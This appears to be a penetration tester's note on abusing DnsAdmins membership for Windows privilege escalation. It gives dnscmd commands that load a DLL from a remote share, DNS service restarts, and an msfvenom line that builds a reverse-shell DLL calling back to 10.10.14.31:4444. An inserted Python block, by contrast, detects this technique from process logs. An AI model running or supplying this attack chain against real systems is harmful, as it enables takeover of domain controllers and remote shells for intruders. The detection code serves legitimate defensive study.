Malicious DLL Injection

dns, privesc, windows

Overview

If a low-privileged user is a member of DnsAdmins, an attacker can inject a malicious DLL into the DNS service and achieve privilege escalation.

Environment Setup and Requirements

Steps

# load
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll

# verify: read back the value that dnscmd wrote to the DNS service parameters
reg query HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

# stop dns
cmd /c sc stop dns

# start dns
cmd /c sc start dns
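
Detection-side view of the steps above, as an added example that is not part of the original notes: it scans process-creation command lines for a `dnscmd` call that sets `serverlevelplugindll`, flags UNC paths, and checks whether a DNS service stop/start followed on the same host. The event tuples, host and account names, the 10-minute window and the severity labels are assumptions made for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (time, host, user, command line).
# Hosts and accounts are made up; the first dnscmd line is the one from the steps above.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:02", "DC01", "corp\\svc-backup", r"dnscmd /enumzones"),
    ("2024-01-10T09:14:40", "DC01", "corp\\jdoe",
     r"dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll"),
    ("2024-01-10T09:15:05", "DC01", "corp\\jdoe", r"cmd /c sc stop dns"),
    ("2024-01-10T09:15:09", "DC01", "corp\\jdoe", r"cmd /c sc start dns"),
    ("2024-01-10T11:30:00", "DC02", "corp\\dnsops",
     r'dnscmd.exe DC02 /Config /ServerLevelPluginDll "C:\Program Files\Vendor\plugin.dll"'),
]

# dnscmd [server] /config /serverlevelplugindll <path>; the path may be quoted.
PLUGIN_SET = re.compile(
    r'\bdnscmd(?:\.exe)?\b.*?/config\b.*?/serverlevelplugindll\s+("[^"]+"|\S+)', re.I)
# Stop/start of the DNS service via sc or net.
DNS_RESTART = re.compile(r'\b(?:sc|net)(?:\.exe)?\s+(?:stop|start)\s+dns\b', re.I)

def find_plugin_changes(events, window=timedelta(minutes=10)):
    """Return one finding per command line that sets ServerLevelPluginDll."""
    parsed = [(datetime.fromisoformat(t), h, u, c) for t, h, u, c in events]
    findings = []
    for ts, host, user, cmd in parsed:
        match = PLUGIN_SET.search(cmd)
        if not match:
            continue
        dll = match.group(1).strip('"')
        remote = dll.startswith("\\\\")  # UNC path: DLL is pulled from a network share
        # Was the DNS service stopped or started on the same host shortly afterwards?
        restarted = any(h == host and ts <= t2 <= ts + window and DNS_RESTART.search(c)
                        for t2, h, _, c in parsed)
        # Severity labels are this example's own choice, not a standard.
        severity = ("critical" if remote and restarted
                    else "high" if remote or restarted else "medium")
        findings.append({"time": ts.isoformat(), "host": host, "user": user, "dll": dll,
                         "remote_path": remote, "restart_followed": restarted,
                         "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in find_plugin_changes(SAMPLE_EVENTS):
        print(finding)
```
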

Troubleshooting

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.31 LPORT=4444 -f dll > evil.dll

// [..redacted...]
	WSACleanup();
	return 0;
}

References